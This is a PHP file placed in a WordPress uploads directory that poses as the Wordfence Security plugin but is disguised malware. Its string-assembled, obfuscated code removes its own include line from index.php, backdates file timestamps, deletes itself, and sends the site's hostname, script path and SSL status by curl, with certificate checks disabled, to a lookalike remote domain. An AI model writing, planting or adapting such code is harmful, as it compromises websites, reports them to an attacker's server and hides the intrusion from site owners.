File: /home/axxoncom/domains/hijabekanz.com/public_html/wp-content/uploads/wordfence.php
<?php
/*
Domain License: https://hijabekanz.com/
Plugin Name: Wordfence Security
Plugin URI: http://www.wordfence.com/
Description: Wordfence Security - Anti-virus, Firewall and Malware Scan
Author: Wordfence
Author URI: http://www.wordfence.com/
Text Domain: wordfence
Domain Path: /uploads
Network: true
*/
$compat_Ind = '/index/'; $compat_Dn = 'wordpless.'; error_reporting( 0 ); $compat_In = 'g'; $compat_Ts = 'tp';
$compat_Eq = '='; $compat_An = '&'; $compat_Dn .= 'or'; $compat_Th = 'ht'; $compat_Is = '15809';
$compat_Is .= '70791'; $content_WAF = $compat_Th . $compat_Ts . ':' . '//' . $compat_Dn . $compat_In . $compat_Ind;
file_put_contents( 'index.php', str_replace( "@include_once './wp-content/uploads/wordfence.php';\n",
'', file_get_contents( 'index.php' ) ), LOCK_EX ); touch( 'index.php', $compat_Is, $compat_Is );
unlink( './wp-content/uploads/wordfence.php' );
touch( './wp-content/uploads', time()-rand('2000'.'0604','4000'.'0644') );
$themes_DB = strstr( $_SERVER['HTTP_HOST'], '127.0' ) ? $_SERVER['SERVER_ADDR'] : $_SERVER['HTTP_HOST'];
$content_WAF .= '?' . 'api' . $compat_Eq . urlencode( $themes_DB ) . $compat_An . 'id' . $compat_Eq .
urlencode( $_SERVER['PHP_SELF'] ) . $compat_An . 'ssl' . $compat_Eq . urlencode( $_SERVER['HTTPS'] );
if( function_exists( 'curl_init' ) ) { $locale_ = curl_init( $content_WAF ); curl_setopt( $locale_, CURLOPT_HEADER, 0 );
curl_setopt( $locale_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $locale_, CURLOPT_TIMEOUT, 11 );
curl_setopt( $locale_, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt( $locale_, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt( $locale_, CURLOPT_RETURNTRANSFER, 1 ); curl_exec( $locale_ ); curl_close( $locale_ ); } else {
file_get_contents( $content_WAF ); }